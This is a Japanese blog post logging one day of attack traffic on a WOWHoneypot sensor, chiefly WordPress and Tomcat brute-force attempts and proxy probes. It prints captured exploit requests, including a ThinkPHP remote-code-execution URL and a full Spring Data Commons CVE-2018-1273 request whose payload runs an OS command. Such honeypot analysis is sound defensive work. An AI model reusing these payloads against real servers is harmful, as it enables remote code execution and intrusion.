23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(12日目)

2019/03/28(木)

今日はJC3 Forum 2019に参加してきました。
今年は他にも色々なセミナーやカンファレンスに参加したいですね。

トータルは1525件でした。

件数 概要 リクエス
1000 Tomcat管理ページへ対するブルートフォース攻撃 GET /manager/html
59 三者中継攻撃 CONNECT www.google.com:80
55 アクセス GET /
15 三者中継攻撃 GET http[:]//domkrim[.]com/av.php
13 三者中継攻撃 GET http[:]//blueforestdigital[.]com/azz/azz.php
12 三者中継攻撃 GET http[:]//ilich[.]in[.]ua/image_add/useful_pictures/_%28260x131%29_4f475e3eb2cb1.php
10 WordPressブルートフォース攻撃 GET /wp-login.php
9 WordPressブルートフォース攻撃 POST /wp/wp-login.php
9 WordPressブルートフォース攻撃 POST /wp-login.php
9 WordPressブルートフォース攻撃 POST /site/wp-login.php
9 WordPressブルートフォース攻撃 POST /myforum/wp-login.php
9 三者中継攻撃 GET http[:]//www[.]ejiar[.]cn/
9 三者中継攻撃 GET http[:]//mojeip[.]net[.]pl/asdfa/azenv.php
9 WordPressブルートフォース攻撃 GET /wp/wp-login.php
9 WordPressブルートフォース攻撃 GET /site/wp-login.php
9 WordPressブルートフォース攻撃 GET /myforum/wp-login.php
9 WordPressブルートフォース攻撃 GET /myblog/wp-login.php
8 WordPressブルートフォース攻撃 POST /myblog/wp-login.php
7 WordPressブルートフォース攻撃 POST /wp1/wp-login.php
7 WordPressブルートフォース攻撃 POST /teststite/wp-login.php
7 WordPressブルートフォース攻撃 POST /testblog/wp-login.php
7 WordPressブルートフォース攻撃 POST /mysite/wp-login.php
7 WordPressブルートフォース攻撃 POST /forum/wp-login.php
7 WordPressブルートフォース攻撃 POST /2017/wp-login.php
7 WordPressブルートフォース攻撃 POST /1/wp-login.php
7 WordPressブルートフォース攻撃 GET /wp1/wp-login.php
7 WordPressブルートフォース攻撃 GET /wordpress/wp-login.php
7 WordPressブルートフォース攻撃 GET /teststite/wp-login.php
7 WordPressブルートフォース攻撃 GET /testblog/wp-login.php
7 WordPressブルートフォース攻撃 GET /mysite/wp-login.php
7 WordPressブルートフォース攻撃 GET /forum/wp-login.php
7 WordPressブルートフォース攻撃 GET /2017/wp-login.php
7 WordPressブルートフォース攻撃 GET /1/wp-login.php
6 WordPressブルートフォース攻撃 POST /wordpress/wp-login.php
6 WordPressブルートフォース攻撃 POST /news/wp-login.php
6 WordPressブルートフォース攻撃 POST /info/wp-login.php
6 WordPressブルートフォース攻撃 POST /blog/wp-login.php
6 WordPressブルートフォース攻撃 POST /2019/wp-login.php
6 WordPressブルートフォース攻撃 GET /news/wp-login.php
6 WordPressブルートフォース攻撃 GET /info/wp-login.php
6 WordPressブルートフォース攻撃 GET /blog/wp-login.php
6 WordPressブルートフォース攻撃 GET /2019/wp-login.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /xmlrpc.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wp/xmlrpc.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /teststite/xmlrpc.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /testblog/xmlrpc.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /site/xmlrpc.php
5 WordPressブルートフォース攻撃 POST /shop/wp-login.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /mysite/xmlrpc.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /myforum/xmlrpc.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /myblog/xmlrpc.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /2017/xmlrpc.php
5 WordPress の Pingback を狙ったブルートフォース攻撃 POST /1/xmlrpc.php
5 WordPressブルートフォース攻撃 GET /shop/wp-login.php
4 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wordpress/xmlrpc.php
4 WordPress の Pingback を狙ったブルートフォース攻撃 POST /news/xmlrpc.php
4 WordPress の Pingback を狙ったブルートフォース攻撃 POST /info/xmlrpc.php
4 WordPress の Pingback を狙ったブルートフォース攻撃 POST /blog/xmlrpc.php
4 WordPress の Pingback を狙ったブルートフォース攻撃 POST /2019/xmlrpc.php
3 WordPress の Pingback を狙ったブルートフォース攻撃 POST /wp1/xmlrpc.php
3 WordPress の Pingback を狙ったブルートフォース攻撃 POST /shop/xmlrpc.php
3 WordPress の Pingback を狙ったブルートフォース攻撃 POST /forum/xmlrpc.php
2 ThinkPHPの脆弱性を狙った攻撃 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った攻撃 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った攻撃 GET /TP/public/index.php
1 Tomcat脆弱性を狙った攻撃 PUT /FxCodeShell.jsp%20
1 Spring Data Commonsの脆弱性(CVE-2018-1273)を狙った通信 POST /users?page=&size=5
1 三者中継攻撃 GET http[:]//www[.]baidu[.]com/?rands=_11164641108469602459472
1 三者中継攻撃 GET http[:]//fr[.]cyberpods[.]net/index.php?app=public&mod=Profile&act=index&uid=1812
1 三者中継攻撃 GET http[:]//157.52.156[.]49:42788/vs.php?rands=_708832378423722249312
1 三者中継攻撃 GET http[:]//104.148.42[.]211:42788/gvs.php?rands=_324548939810531081253760
1 不明 GET /about/version
1 WordPressの調査 GET ///wp-json/wp/c/
1 WordPressの調査 GET ///?author=1

今日はWordPress関連が多いですね。

Spring Data Commonsの脆弱性(CVE-2018-1273)を狙った通信を初めて観測しました。
OSコマンドインジェクションの類なんですね。

POST /users?page=&size=5

内容は以下でした。

POST /users?page=&size=5 HTTP/1.1
Host: ***.***.***.***:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=


一件わからないものがありました。。。
ただの調査なのかな?
わかる方いたら教えていただきたいです。。

GET /about/version

GET /about/version HTTP/1.0

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36Accept: */*